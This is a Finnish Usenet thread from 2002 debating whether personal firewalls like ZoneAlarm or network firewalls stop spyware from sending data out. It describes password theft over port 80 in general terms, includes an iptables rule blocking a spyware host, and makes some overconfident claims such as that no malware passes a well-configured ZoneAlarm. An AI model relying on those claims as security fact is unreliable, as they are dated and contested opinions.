zone alarm asetus
hannu varho
päästä nettiin vai pitääkö senkin kysyä lupa?,koska se on myöskin nettiin
pääsevien listalla.
Suoraan olen luvan antanut selaimelle ja Outlookille.
Kysymys tämäkin??mutta vastauksesta kiitollinen.
Musti
kaikki mahdolliset mitä ei tarvitse
silloin säilyy mielenrauha ja nukkuu hyvin
"hannu varho" <hannu...@satabaana.net> wrote in message
news:ae4mna$bnc$1...@news1.song.fi...
Markus Jansson
<hannu...@satabaana.net> wrote:
> Mikähän sitten olisi itse Zone Alarmin oikea asetus..eli pitääkö sen aina
> päästä nettiin vai pitääkö senkin kysyä lupa?,koska se on myöskin nettiin
> pääsevien listalla.
Katsoppa http://www.markusjansson.net/fza.html :)
Markus Jansson
----------------------------------------
My privacy related homepages and PGPkey
http://www.markusjansson.net
Kai Puolamaki
> kannattaa pitää kaikki ohjelmat kysyttävien listalla ja sitten
> kieltää kaikki mahdolliset mitä ei tarvitse silloin säilyy
> mielenrauha ja nukkuu hyvin
Jos esimerkiksi sallii webbiselaimen pääsyn webbiin varoituksitta,
niin silloin myös haittaohjelmat pääsevät nettiin webbiselaimen
avustuksella ilman, että lelupalomuuri varoittaisi asiasta, kuten
eilen artikkelissa news:5p24ea...@cs76092.pp.htv.fi kirjoitin.
Eli oikeasti nämä "henkilökohtaiset" palomuurit eivät voi varmasti
estää haittaohjelmien kommunikointia ulkomaailman kanssa, toisin kuin
jotkut mainokset ehkä antavat ymmärtää.
[ObNipo: Voisitko ystävällisesti supistaa lainauksia ja kommentoida
lainauksen _jälkeen_, jotta artikkelejasi olisi helpompi lukea. Ks.
erityisesti kohtaa kolme: http://www.iki.fi/janka/7ohjetta.html ]
--
http://www.iki.fi/kaip/
Puolusta sähköisiä oikeuksiasi. Liity Electronic Frontier Finlandin
jäseneksi. http://www.effi.org/
Markus Jansson
wrote:
> Jos esimerkiksi sallii webbiselaimen pääsyn webbiin varoituksitta,
> niin silloin myös haittaohjelmat pääsevät nettiin webbiselaimen
> avustuksella ilman, että lelupalomuuri varoittaisi asiasta, kuten
> eilen artikkelissa news:5p24ea...@cs76092.pp.htv.fi kirjoitin.
Look'n Stop estää tämän muistaakseni. ZA ei oikein.
> Eli oikeasti nämä "henkilökohtaiset" palomuurit eivät voi varmasti
> estää haittaohjelmien kommunikointia ulkomaailman kanssa, toisin kuin
> jotkut mainokset ehkä antavat ymmärtää.
MIKÄÄN ei anna täydellistä suojaa. Eivät edes ne "oikeat rautapalomuurit"
joihin vertaat. Itse asiassa ne antavat täysin olemattoman suojan ulospäin
menevän liikenteen suhteen.
Kai Puolamaki
> On 12 Jun 2002 09:30:27 +0300, Kai Puolamaki <Kai.Pu...@iki.fi>
> wrote:
> > Eli oikeasti nämä "henkilökohtaiset" palomuurit eivät voi varmasti
> > estää haittaohjelmien kommunikointia ulkomaailman kanssa, toisin kuin
> > jotkut mainokset ehkä antavat ymmärtää.
>
> MIKÄÄN ei anna täydellistä suojaa. Eivät edes ne "oikeat rautapalomuurit"
> joihin vertaat.
Kukaan ei ole muuta väittänytkään, paitsi ehkä jotkut
"henkilökohtaisten" palomuurien mainokset. Ulkoiset palomuurit eivät
myöskään näytä
vakava-hyökkäys-torjuttu-(osta-pro-versio-heti)-pop-up-ikkunaa
jokaisesta harmittomasta traceroutesta
> Itse asiassa ne antavat täysin olemattoman suojan ulospäin menevän
> liikenteen suhteen.
"Henkilökohtaiset" palomuurit eivät voi varmasti estää haittaohjelmien
kommunikointia ulkomaailman kanssa.
Markus Jansson
wrote:
> Markus Jansson <jansson...@ziplip.com> writes:
> Kukaan ei ole muuta väittänytkään, paitsi ehkä jotkut
> "henkilökohtaisten" palomuurien mainokset. Ulkoiset palomuurit eivät
> myöskään näytä vakava-hyökkäys-torjuttu-(osta-pro-versio-heti)-pop-up-
> ikkunaa jokaisesta harmittomasta traceroutesta
Tosin, tällä hetkellä ei ole olemassa yhtään ohjelmaa joka voisi mennä esim.
minun ZAP:stani läpi nettiin välittämään tietoa minun tietämättäni. Sen
sijaan on tuhansia ohjelmia jotka viuhahtavat ulkoisesta palomuurista läpi
välittämään tietoa käyttäjien tietämättä.
Siitä voi jotakin päätellä sen suhteen kumpi on turvallisempi ratkaisu.
> "Henkilökohtaiset" palomuurit eivät voi varmasti estää haittaohjelmien
> kommunikointia ulkomaailman kanssa.
Mikään ei voi 100% varmuudella. Olemassa olevista ohjelmista (kuten ZAP)
kuitenkin henkilökohtaiset palomuurit estävät oikein konfiguroituina kaikki
nykyään saatavilla olevien haittaohjelmien kommunikoinnin ulkomaailmaan.
YKSIKÄÄN "oikea" palomuuri ei pysty samaan. Taas kerran, siitä voi
päätellä kumpi on turvallisempi ja parempi ratkaisu koneen suojaamiseksi.
Sauli Luoto
> Tosin, tällä hetkellä ei ole olemassa yhtään ohjelmaa joka voisi mennä esim.
> minun ZAP:stani läpi nettiin välittämään tietoa minun tietämättäni. Sen
> sijaan on tuhansia ohjelmia jotka viuhahtavat ulkoisesta palomuurista läpi
> välittämään tietoa käyttäjien tietämättä.
>
> Siitä voi jotakin päätellä sen suhteen kumpi on turvallisempi ratkaisu.
Tarkoitat varmasti, että ei ole olemassa yhtäkään ohjelmaa, josta olisit
tietoinen. Nuo kaksi asiaa kun eivät merkitse samaa.
Olisi ihan mielenkiintoista saada lista niistä tuhansista ohjelmista,
jotka viuhahtavat läpi ulkoisesta palomuurista. Tässähän olisi selvä
bugi-raportin paikka. Tai sitten olet vain trollipeikko.
Oletetaan vaikka hypotettiinen spyware-ohjelma x joka käyttää protokollaa
tcp ja avaa yhteyden firman bula-bula.com -palvelimelle käyttäen porttinumeroa
456.
Uskot todella että jos ulkoisen palomuurin säännöissä kielletään tuo
liikenne, niin se menee silti läpi, vai jauhatko ihan vain lämpimiksesi
sontaa?
> YKSIKÄÄN "oikea" palomuuri ei pysty samaan. Taas kerran, siitä voi
> päätellä kumpi on turvallisempi ja parempi ratkaisu koneen suojaamiseksi.
Tee bugi-raportti ja anna linkki jossa tästä reiästä kertoo joku muukin
kuin sinä.
--
Sauli
---
Sauli Luoto - slu...@lut.fi - www.lut.fi/~sluoto - 050-5447211
Markus Jansson
> Tarkoitat varmasti, että ei ole olemassa yhtäkään ohjelmaa, josta olisit
> tietoinen. Nuo kaksi asiaa kun eivät merkitse samaa.
Totta, totta. Mutta suuntaa se toki antaa.
> Olisi ihan mielenkiintoista saada lista niistä tuhansista ohjelmista,
> jotka viuhahtavat läpi ulkoisesta palomuurista. Tässähän olisi selvä
> bugi-raportin paikka. Tai sitten olet vain trollipeikko.
> Oletetaan vaikka hypotettiinen spyware-ohjelma x joka käyttää protokollaa
> tcp ja avaa yhteyden firman bula-bula.com -palvelimelle käyttäen
> porttinumeroa 456.
> Uskot todella että jos ulkoisen palomuurin säännöissä kielletään tuo
> liikenne, niin se menee silti läpi, vai jauhatko ihan vain lämpimiksesi
> sontaa?
Jos se spyware ilmoittaa että haluaa käyttää porttia 80 päästäkseen
"webbiin" niin ihan varmasti viuhahtaa ulos, tietenkin vain jos palomuuri on
konfiguroitu sallimaan työntekijöiden webbisurffailut. Vaihtoehtoisesti voi
käyttää SSH tai telnet portteja. Ei verkon rajalla oleva palomuuri voi tietää
varmaksi hölkäsen pöläystä siitä MIKÄ koettaa mennä ulos jostain
työasemalta.
Molempiin suuntiin liikennettä ei todennäköisesti voisi pitää yllä, paitsi tietysti
aktiivisen webbisivuston tms. kautta jolta satelee komentoja koneeseen joka
"muka" on webissä surffaamassa tms.
Tietysti jos kaikki portit ulos ja sisäänpäin on tukittu rajalla olevalla
palomuurilla niin sitten ei tietenään ulos eikä sisälle pääse. Ei millään
muullakaan ohjelmalla, esim. webbiselaimella.
Sauli Luoto
>> Tarkoitat varmasti, että ei ole olemassa yhtäkään ohjelmaa, josta olisit
>> tietoinen. Nuo kaksi asiaa kun eivät merkitse samaa.
> Totta, totta. Mutta suuntaa se toki antaa.
"Ei tästä muurista ole ennenkään päästy läpi, niin ei pääse nytkään?",
tuota suuntaa se toki antaa. On taas toinen asia kuinka vaarallista
legendaarinen "väärä turvallisuuden tunne voi olla".
> Jos se spyware ilmoittaa että haluaa käyttää porttia 80 päästäkseen
> "webbiin" niin ihan varmasti viuhahtaa ulos, tietenkin vain jos palomuuri on
> konfiguroitu sallimaan työntekijöiden webbisurffailut. Vaihtoehtoisesti voi
> käyttää SSH tai telnet portteja. Ei verkon rajalla oleva palomuuri voi tietää
> varmaksi hölkäsen pöläystä siitä MIKÄ koettaa mennä ulos jostain
> työasemalta.
Siksi paketteja suodatetaankin tarvittaessa pelkän kohdeosoitteen
perusteella, eli estetään pääsy vaikkapa koko spy-ware:n keruu palvelimelle.
Oli portti tai protokolla mikähyvänsä.
Ei vain yksinkertaisesti lasketa ulos mitään paketteja, jotka ovat
matkalla bula-bula.com -palvelimelle tai tulossa sieltä.
> Molempiin suuntiin liikennettä ei todennäköisesti voisi pitää yllä, paitsi tietysti
> aktiivisen webbisivuston tms. kautta jolta satelee komentoja koneeseen joka
> "muka" on webissä surffaamassa tms.
>
> Tietysti jos kaikki portit ulos ja sisäänpäin on tukittu rajalla olevalla
> palomuurilla niin sitten ei tietenään ulos eikä sisälle pääse. Ei millään
> muullakaan ohjelmalla, esim. webbiselaimella.
Jos suodatetaan liikennettä sen mukaan mihin se suuntautuu niin on totta,
että mitään liikennettä ei pääse sinne spy-ware -palvelimelle. Mutta eikös
se ollutkin juuri koko homman pointti?
Ari Laitinen
"Markus Jansson" <jansson...@ziplip.com> kirjoitti viestissä
news:1104_10...@news.utu.fi...
> Tosin, tällä hetkellä ei ole olemassa yhtään ohjelmaa joka voisi mennä
esim.
> minun ZAP:stani läpi nettiin välittämään tietoa minun tietämättäni. Sen
> sijaan on tuhansia ohjelmia jotka viuhahtavat ulkoisesta palomuurista läpi
> välittämään tietoa käyttäjien tietämättä.
Mutta voidaan vaikka heti tehdä sellainen ohjelma, joka menee siitä läpi jos
on tarve. Eikös niin?
Tällainen ohjelma voisi vaikka näppäillä sähköpostiviestin
sähköpostiohjelmaan ja lähettää sen.
Markus Jansson
> "Ei tästä muurista ole ennenkään päästy läpi, niin ei pääse nytkään?",
> tuota suuntaa se toki antaa. On taas toinen asia kuinka vaarallista
> legendaarinen "väärä turvallisuuden tunne voi olla".
Totta, totta. Kuitenkin, voidaan sanoa perustellusti että tällä hetkellä mikään
tunnettu haittaohjelma ei siitä pääse läpi jos se on oikein konfiguroitu.
> Siksi paketteja suodatetaankin tarvittaessa pelkän kohdeosoitteen
> perusteella, eli estetään pääsy vaikkapa koko spy-ware:n keruu
> palvelimelle. Oli portti tai protokolla mikähyvänsä.
> Ei vain yksinkertaisesti lasketa ulos mitään paketteja, jotka ovat
> matkalla bula-bula.com -palvelimelle tai tulossa sieltä.
Mutta mistä tiedä mikä palvelin on hakkerin palvelin? Et voi tietää mistään.
Voi perustaa huomanna oman palvelimen ja ylihuomenna vaihtaa sen
toiseen osoitteeseen.
Myönnä vaan suoraan, että "oikea" palomuuri ei anna käytännössä MITÄÄN
suojaa ulospäin meneviä haittaohjelmia kohtaan koska useat niistä voidaan
laittaa käyttämään yleisesti avoimena olevia portteja.
> Jos suodatetaan liikennettä sen mukaan mihin se suuntautuu niin on
> totta, että mitään liikennettä ei pääse sinne spy-ware -palvelimelle. Mutta
> eikös se ollutkin juuri koko homman pointti?
Et voi tietää mikä on spywarepalvelin ja mikä ei. Et voi mitenkään listata ja
tietää jokaista hakkerin ylläpitämää palvelinta, varsinkaan jos joku perustaa
omansa juuri sitä varten että voi käyttää sitä juuri sinua vastaan.
Katso edeltä.
Markus Jansson
wrote:
> Mutta voidaan vaikka heti tehdä sellainen ohjelma, joka menee siitä läpi
> jos on tarve. Eikös niin?
Teoriassa ehkä. Käytännössä.... Sanon edelleen: Tällä hetkellä ei ole
olemassa sellaista haittaohjelmaa joka pääsisi oikein konfiguroidun
ZoneAlarm palomuurin läpi.
Sen sijaan on olemassa joukko haittaohjelmia ja SELLAISIA on helppo
tehdä lisää jotka menevät vaikka portista 80 ulos (jotka rautapalomuurit
yleensä jättävät ulospäin auki jotta nettiin päästään) ja raportoivat ihan
kaiken hakkerille jossakin toisella puolen maailmaa. Sitä ei "oikea
rautapalomuuri" estä yhtään mitenkään.
Näin ollen, summa summarun: Rautapalomuuri sulkee kyllä varmuudella
ulkoa sisäänpäin tulevat portit ja estää yhteyden ottamista systeemin sisälle.
Softapalomuuri sen sijaan ehkäisee yhteydenottoja systeemin sisältä
ulospäin erittäin hyvin, tosin myös kyllä ulkoa sisäänpäinkin, mutta ei
ehdottoman varmasti.
Ari Laitinen
> On Thu, 13 Jun 2002 18:27:03 +0300, "Ari Laitinen" <nos...@arisoft.fi>
> wrote:
> > Mutta voidaan vaikka heti tehdä sellainen ohjelma, joka menee siitä läpi
> > jos on tarve. Eikös niin?
>
> Teoriassa ehkä. Käytännössä.... Sanon edelleen: Tällä hetkellä ei ole
> olemassa sellaista haittaohjelmaa joka pääsisi oikein konfiguroidun
> ZoneAlarm palomuurin läpi.
Miksi haittaohjelman ylipäänsä pitäisi yrittää päästä sen läpi. Eihän
tarkoitus ole tehdä haittaa jonkin toisen koneelle vaan sille koneelle,
jossa ohjelma on asennettuna.
Sauli Luoto
> On 13 Jun 2002 14:26:28 GMT, slu...@maa1.cc.lut.fi (Sauli Luoto) wrote:
>> "Ei tästä muurista ole ennenkään päästy läpi, niin ei pääse nytkään?",
>> tuota suuntaa se toki antaa. On taas toinen asia kuinka vaarallista
>> legendaarinen "väärä turvallisuuden tunne voi olla".
> Totta, totta. Kuitenkin, voidaan sanoa perustellusti että tällä hetkellä mikään
> tunnettu haittaohjelma ei siitä pääse läpi jos se on oikein konfiguroitu.
Toisaalta voidaan myöskin sanoa, että mikään tunnettu haittaohjelma ei
pääse myöskään ulkoisesta palomuurista läpi. Tunnettu ohjelmahan on
sellainen, jonka käyttäytyminen tiedetään. Ja kun käyttäytyminen
tiedetään, niin se voidaan säännöillä estää.
> Mutta mistä tiedä mikä palvelin on hakkerin palvelin? Et voi tietää mistään.
> Voi perustaa huomanna oman palvelimen ja ylihuomenna vaihtaa sen
> toiseen osoitteeseen.
>
> Myönnä vaan suoraan, että "oikea" palomuuri ei anna käytännössä MITÄÄN
> suojaa ulospäin meneviä haittaohjelmia kohtaan koska useat niistä voidaan
> laittaa käyttämään yleisesti avoimena olevia portteja.
Ja mitenkäs luulet sen haittaohjelman pysyvän perässä siinä mihin niitä
tietoja tulee lähettää, ei niitä voida millään algoritmeillä laskea.
Näinollen käytännössä ainoa tapa tehdä niitä ohjelmia on koodata
osoite/porttinumero jne ohjelmaan sisään, ja kun siinävaiheessa kun
ohjelma tunnistetaan haittaohjelmaksi tiedetään myös mihin ja miten se koittaa
tietojaan lähettää ja se voidaan myös estää.
> Et voi tietää mikä on spywarepalvelin ja mikä ei. Et voi mitenkään listata ja
> tietää jokaista hakkerin ylläpitämää palvelinta, varsinkaan jos joku perustaa
> omansa juuri sitä varten että voi käyttää sitä juuri sinua vastaan.
>
> Katso edeltä.
On totta, että kuka tahansa voi perustaa millaisen palvelimen tahansa,
mutta niistä palvelimista on hyötyä vasta siinä vaiheessa, kun ihmisten
tietokoneille saadaan ujutettua asiakas-ohjelmia, joka lähettää
palvelimelle tietoja. Ja kun on olemassa asiakasohjelma niin nähdään oitis
mihin ja miten se kommunikoi, ja se voidaan estää.
Markus Jansson
> Toisaalta voidaan myöskin sanoa, että mikään tunnettu haittaohjelma ei
> pääse myöskään ulkoisesta palomuurista läpi. Tunnettu ohjelmahan on
> sellainen, jonka käyttäytyminen tiedetään. Ja kun käyttäytyminen
> tiedetään, niin se voidaan säännöillä estää.
Ei voida. Kerro millä säännöllä estät yrityksen palomuurista käsin, että
jonkun työntekijän tietokoneelta haittaohjelma, joka käyttää portti 80 ulos, ei
pääse lavertelemaan löytöjään toiselle puolen maapalloa? ET MITENKÄÄN.
> Ja mitenkäs luulet sen haittaohjelman pysyvän perässä siinä mihin niitä
> tietoja tulee lähettää, ei niitä voida millään algoritmeillä laskea.
> Näinollen käytännössä ainoa tapa tehdä niitä ohjelmia on koodata
> osoite/porttinumero jne ohjelmaan sisään, ja kun siinävaiheessa kun
> ohjelma tunnistetaan haittaohjelmaksi tiedetään myös mihin ja miten se
> koittaa tietojaan lähettää ja se voidaan myös estää.
Seliseli. Jos haittaohjelma voidaan huomata niin sitten se voidaan
samantien poistaa eikä palomuurausta edes tarvita koettamaan rajoittaa
sen toimintaa.
Pointtini nimenomaan on, että haittaohjelma voidaan konfiguroida ottamaan
yhteys tietyyn hakkerin osoittamaan IP-osoitteeseen asennusvaiheessa (eli
laittaa asetukset valmiiksi pakettiin joka sitten saatetaan kohdekoneeseen
asentumaan käyttäen typeriä käyttäjiä, tietoturva-aukkoja tai röyhkeätä
tunkeutumista suoraan fyysisesti tietokoneelle. Sitten se lähettelee portin
80 kautta vaikka kirjoitettuja salasanoja ja vastaavia sinne hakkerille.
> On totta, että kuka tahansa voi perustaa millaisen palvelimen tahansa,
> mutta niistä palvelimista on hyötyä vasta siinä vaiheessa, kun ihmisten
> tietokoneille saadaan ujutettua asiakas-ohjelmia, joka lähettää
> palvelimelle tietoja. Ja kun on olemassa asiakasohjelma niin nähdään oitis
> mihin ja miten se kommunikoi, ja se voidaan estää.
Eikä nähdä oitis. Millä näet sen? Virustentorjuntaohjelmalla? Arvaa
uudestaan, eivät löydä useimpia uudehkoja ohjelmia, esim.
www.astalavista.com löytyy kasapäin softaa jota mikään
virustentorjuntaohjelma ei löydä.
Kun et huomaa etkä tiedä että koneessa on haittaohjelma niin et voi jäljittää
sitä ja sen käyttämää IP:tä mitenkään. Jos taas löydät haittaohjelman niin
sitten taas mitään palomuurausta tms. edes tarvittaisi koska tietysti
poistaisit ko. ohjelman koneeltasi.
SEN SIJAAN...jos koneessa olisi loistava henkilökohtainen palomuuri, kuten
vaikkapa ZoneAlarm, se hälyttäisi heti että outo ohjelma pyrkii nettiin (eikä
päästäisi ilman erillistä lupaa sitä menemään). Oikein asennettuna tavallinen
käyttäjä ei voisi päästää MITÄÄN ohjelmaa nettiin, ainoastaan ylläpitäjä joka
on etukäteen antanut internet selaimelle oikeuden mennä nettiin. Sitten kun
tämä haittaohjelma antaisi hälytyksen palomuuriin, ylläpitäjä singahtaisi
paikalle, hakisi ko. nimisen tiedoston ja poistaisi sen hevon kuuseen.
Homma ratkaistu eikä pelkoakaan tietomurrosta. VOILA!
Ja ennen kuin sanot, esimerkiksi minulla on sellainen kokoonpano että
ZoneAlarm Pro:n asetuksia EI VOI muuttaa eikä sitä sulkea mitenkään jos
en ole 1) pääkäyttäjän tunnuksilla kirjautunut 2) kirjoita vielä erillistä ZAP
salasanaa. Jos turmelet itse ohjelman, se lukitsee nettiyhteyden joten
mikään ei pääse nettiin (pl. ohjelmat joilla sinne oli jo aiemmin pääsy).
Tavallinen tahvo käyttäjä ei edes voisi aikaansaada mitään mikä voisi
aiheuttaa haittaohjelmia pääsemästä nettiin tällä koneella vaikka suorittaisi
mitä ohjelmia!!!
Markus Jansson
wrote:
> Miksi haittaohjelman ylipäänsä pitäisi yrittää päästä sen läpi. Eihän
> tarkoitus ole tehdä haittaa jonkin toisen koneelle vaan sille koneelle,
> jossa ohjelma on asennettuna.
Puhe oli siitä että rautapalomuurit ovat hyödyttömiä suojaamaan todella
tietokoneita verkon sisältä ja että siihen tarvitaan ehdottomasti
konekohtaiset omat palomuurit oikeilla asetuksilla.
Haittaohjelman ei tietenkään tarvitse päästä nettiin, mutta pirun paljon
parempi on jos pääsee....muuten hakkerin tarvitsee päästä fyysisesti
koneelle keräämään esim. ohjelman tallentamat salasanat tms. talteen. Kun
haittaohjelma pääsee vapaasti nettiin minkään "oikean rautapalomuurin"
kykenemättä sitä mitenkään estämään...se voi lähettää kaapatut tiedot
minne tahansa, kenelle tahansa ja miten usein tahansa. Tietysti järkevä
haittaohjelma lähettää tietoja vain silloin kun käyttäjä on koneellaan ja tekee
jotain jotta ei tule mitään "mutta miks mun hubi/nettiyhteys muka on
toiminnassa vaikka mää istun huusissa" juttuja.
Sauli Luoto
>> Toisaalta voidaan myöskin sanoa, että mikään tunnettu haittaohjelma ei
>> pääse myöskään ulkoisesta palomuurista läpi. Tunnettu ohjelmahan on
>> sellainen, jonka käyttäytyminen tiedetään. Ja kun käyttäytyminen
>> tiedetään, niin se voidaan säännöillä estää.
> Ei voida. Kerro millä säännöllä estät yrityksen palomuurista käsin, että
> jonkun työntekijän tietokoneelta haittaohjelma, joka käyttää portti 80 ulos, ei
> pääse lavertelemaan löytöjään toiselle puolen maapalloa? ET MITENKÄÄN.
iptables -A INET-ULOS -d spy.ware.palvelin.microsoft.com -j DROP
Tuolla estetään kaikki liikenne palvelimelle, voitaisiin toki määritellä
tarkemminkin, jos vaikka olisi jotain muuta asiaa tuonne. Tavallisesti
tuskin on mitään aisaa kuitenkaan palvelimelle, joka kerää spy-warea tms.
Jospa otat hieman selvää asioista ennenkuin kerrot mitä oikeilla
palomuureilla voidaan tehdä ja mitä ei voida tehdä.
> Seliseli. Jos haittaohjelma voidaan huomata niin sitten se voidaan
> samantien poistaa eikä palomuurausta edes tarvita koettamaan rajoittaa
> sen toimintaa.
Se voidaan poistaa, jos se sattuu olemaan yksittäinen ohjelma, mutta entäs
se kaikki Windows-ohjelmiin sisäänrakennettu paska. Ja toisaalta, jos se
tiedosto on kerran päässyt koneelle, niin miksi se ei voisi päästä toista
kertaa sinne?
> Pointtini nimenomaan on, että haittaohjelma voidaan konfiguroida ottamaan
> yhteys tietyyn hakkerin osoittamaan IP-osoitteeseen asennusvaiheessa (eli
> laittaa asetukset valmiiksi pakettiin joka sitten saatetaan kohdekoneeseen
> asentumaan käyttäen typeriä käyttäjiä, tietoturva-aukkoja tai röyhkeätä
> tunkeutumista suoraan fyysisesti tietokoneelle. Sitten se lähettelee portin
> 80 kautta vaikka kirjoitettuja salasanoja ja vastaavia sinne hakkerille.
Jos nyt puhutaan tuosta äsken mainitsemastasi kuvittellisesta yrityksestä,
niin kerroppa missä yrityksessä tehdään hommat niin päin persettä että
käyttäjä voi asentaa itse ohjelmia koneelle, ja vieläpä testaamattomia
ohjelmia. Ja missä tallennetaan mitään muita salasanoja koneella kuin
iltalehden www-version tunnukset.
Noh, enivei, kuten jo kerroin ja osoitin palomuurin voi konfiguroida niin,
että estetään johonkin tiettyy ip:hen lähtevät yhteydet. Firmoissa lienee
melko yleistä, että palomuurin yhteydessä on myös läpinäkyvä
proxy-palvelin, jonka läpi liikenne pakotetaan.
>> On totta, että kuka tahansa voi perustaa millaisen palvelimen tahansa,
>> mutta niistä palvelimista on hyötyä vasta siinä vaiheessa, kun ihmisten
>> tietokoneille saadaan ujutettua asiakas-ohjelmia, joka lähettää
>> palvelimelle tietoja. Ja kun on olemassa asiakasohjelma niin nähdään oitis
>> mihin ja miten se kommunikoi, ja se voidaan estää.
> Eikä nähdä oitis. Millä näet sen? Virustentorjuntaohjelmalla? Arvaa
> uudestaan, eivät löydä useimpia uudehkoja ohjelmia, esim.
> www.astalavista.com löytyy kasapäin softaa jota mikään
> virustentorjuntaohjelma ei löydä.
Jopa rakkaassa Windowsissasi taitaa olla käsky netstat, se kertoo mistä
portista ja mihin porttiin/ip:hen ollaan yhteydessä ja missä tilassa
protokolla on. Hienostuneempiakin tapoja analysoida ohjelman tuottamaa
liikennettä toki on, mutta tuokin kertoo kaiken tarvittavan sen
estämiseen.
> Kun et huomaa etkä tiedä että koneessa on haittaohjelma niin et voi jäljittää
> sitä ja sen käyttämää IP:tä mitenkään. Jos taas löydät haittaohjelman niin
> sitten taas mitään palomuurausta tms. edes tarvittaisi koska tietysti
> poistaisit ko. ohjelman koneeltasi.
>
> SEN SIJAAN...jos koneessa olisi loistava henkilökohtainen palomuuri, kuten
> vaikkapa ZoneAlarm, se hälyttäisi heti että outo ohjelma pyrkii nettiin (eikä
> päästäisi ilman erillistä lupaa sitä menemään). Oikein asennettuna tavallinen
> käyttäjä ei voisi päästää MITÄÄN ohjelmaa nettiin, ainoastaan ylläpitäjä joka
> on etukäteen antanut internet selaimelle oikeuden mennä nettiin. Sitten kun
> tämä haittaohjelma antaisi hälytyksen palomuuriin, ylläpitäjä singahtaisi
> paikalle, hakisi ko. nimisen tiedoston ja poistaisi sen hevon kuuseen.
> Homma ratkaistu eikä pelkoakaan tietomurrosta. VOILA!
>
> Ja ennen kuin sanot, esimerkiksi minulla on sellainen kokoonpano että
> ZoneAlarm Pro:n asetuksia EI VOI muuttaa eikä sitä sulkea mitenkään jos
> en ole 1) pääkäyttäjän tunnuksilla kirjautunut 2) kirjoita vielä erillistä ZAP
> salasanaa. Jos turmelet itse ohjelman, se lukitsee nettiyhteyden joten
> mikään ei pääse nettiin (pl. ohjelmat joilla sinne oli jo aiemmin pääsy).
> Tavallinen tahvo käyttäjä ei edes voisi aikaansaada mitään mikä voisi
> aiheuttaa haittaohjelmia pääsemästä nettiin tällä koneella vaikka suorittaisi
> mitä ohjelmia!!!
Koska palomuurin tehtävä ei ole tarkkailla ajettavia ohjelmia tuo on
mielestäni hyödytöntä, samaten ylläpitäjän juoksuttaminen. Jos haluan
todellista suojaa koneeni menee nettiin proxy/firewall yhdistelmän läpi,
joka ei sijaitse samalla koneella. Tuolla saavutetaan se suoja, mitä sinä
luulet saavuttavasi ZAP:illa. Ja tuo tarkoittamani firewall on osa
kerneliä, eikä jokin kernelin ulkopuolinen ohjelma, joka voidaan loppupeleissä
ohittaa/sammuttaa.
Kyllä, se ZAP voidaan todellakin sammuttaa, johtuen siitä että se on vain
yksi prosessi. Siinä voi olla joitakin lukituksia, suojauksia taikka mitä
tahansa, mutta se ei muuta sitä faktaa että se on prosessi jota ydin pitää
käynnissä, ja jonka se voi myös sammuttaa. Eikä tarvitse edes salasanaa.
Mika Yrjola
> Puhe oli siitä että rautapalomuurit ovat hyödyttömiä suojaamaan todella
> tietokoneita verkon sisältä ja että siihen tarvitaan ehdottomasti
> konekohtaiset omat palomuurit oikeilla asetuksilla.
Tai tarkkaillaan silmä kovana, että koneissa on asennettuna vain
turvalliseksi kohtuullisella varmuudella tiedettyjä ohjelmia, eikä
uusia voi kuka tahansa random - ihminen asentaa triviaalisti?
--
/-------------------------------------------------------------------------\
I Fantasy, Sci-fi, Linux, Amiga, Telecommunications, Oldfield, Vangelis I
I Seti@Home, Steady relationship, more at http://www.lut.fi/%7emyrjola/ I
\-------------------------------------------------------------------------/
Ari Laitinen
> Puhe oli siitä että rautapalomuurit ovat hyödyttömiä suojaamaan todella
> tietokoneita verkon sisältä ja että siihen tarvitaan ehdottomasti
> konekohtaiset omat palomuurit oikeilla asetuksilla.
Ei oikein vakuuta että tuo lähestymistapa olisi niin hyödyllinen että asiaa
pitäisi kuvata sanalla "ehdottomasti"
Sen sijaan olisi ehdottomasti pidettävä huoli siitä että sisäverkossa ei
käyttäjät saa ajella mitään muuta kuin mihin heillä on lupa.
Matti Juhani Kurkela
> On Fri, 14 Jun 2002 00:12:36 +0300, "Ari Laitinen" <nos...@arisoft.fi>
> wrote:
> > Miksi haittaohjelman ylipäänsä pitäisi yrittää päästä sen läpi. Eihän
> > tarkoitus ole tehdä haittaa jonkin toisen koneelle vaan sille koneelle,
> > jossa ohjelma on asennettuna.
>
> Puhe oli siitä että rautapalomuurit ovat hyödyttömiä suojaamaan todella
> tietokoneita verkon sisältä ja että siihen tarvitaan ehdottomasti
> konekohtaiset omat palomuurit oikeilla asetuksilla.
Näin voi ollakin, jos lähdetään siitä oletuksesta että koneeseen voi
tulla mitä ohjelmia hyvänsä mistä hyvänsä. Tällöin ollaan jo valmiiksi
tappiolla suuressa tietoturvallisuuspelissä. Tietoturvaan vakavasti
suhtautuvat yritykset eivät kertakaikkiaan voi toimia näin.
Parempi tapa on asentaa ensin koneet siten, että niiden asetukset ja
asennetut ohjelmat ovat tiedetysti turvalliset (parhaan
asennushetkellä saatavissa olevan tiedon mukaan). Sitten varmistetaan
että haittaohjelmia ei tule mistään sisään: tämä tarkoittaa sitä että
peruskäyttäjällä ei ole oikeutta asentaa ohjelmia eikä mahdollisuutta
ohittaa virustarkistusta. Äärimmillään peruskäyttäjien koneista
otetaan korppuasemat ja CD-asemat irti ja kotelot lukitaan, mutta
yleensä näin pitkälle ei tarvitse mennä kunhan käyttäjät pannaan
allekirjoittamaan sopivansisältöinen tietoturvasitoumus.
Kaikki liikenne sisäverkon ulkopuolelle pannaan kulkemaan sopivan
proxyn kautta. Näin tehdään haittaohjelmien toiminta hankalammaksi:
ulospäin porttiin 80 suuntautuvan liikenteen on oltava ainakin
muodollisesti HTTP:n näköistä. Jos lisäksi tarkistetaan että
lähetettävä hakupyyntö ei ole ylipitkä (yli kilotavun mittainen HTTP
GET-komento haisee jo aika pahalle) ja estetään kokonaan pääsy
tunnettuihin haittaohjelmien yhteydenottokohteisiin, haittaohjelmien
toiminta on jo aika vaikeaa... sitäpaitsi, haittaohjelman olisi
ensiksi päästävä sisäverkkoon. Jos proxy suodattaa pois
ActiveX-komponentit ja muut tietoturvallisesti epäilyttävät
datamuodot, haittaohjelman mahdollisuudet päästä käynnistymään
sisäverkon koneessa ovat aika pienet.
> Haittaohjelman ei tietenkään tarvitse päästä nettiin, mutta pirun paljon
> parempi on jos pääsee....muuten hakkerin tarvitsee päästä fyysisesti
> koneelle keräämään esim. ohjelman tallentamat salasanat
> tms. talteen.
Jos järjestelmästä halutaan turvallinen, joko järjestelmään ei saa
päästää haittaohjelmia tai sitten käyttöjärjestelmän on oltava todella
fasistista tyyppiä, ks. alempana.
Mielestäni kaikille nykyisin laajassa käytössä oleville
käyttöjärjestelmille pätee yksi ja sama sääntö: jos koneeseen pääsee
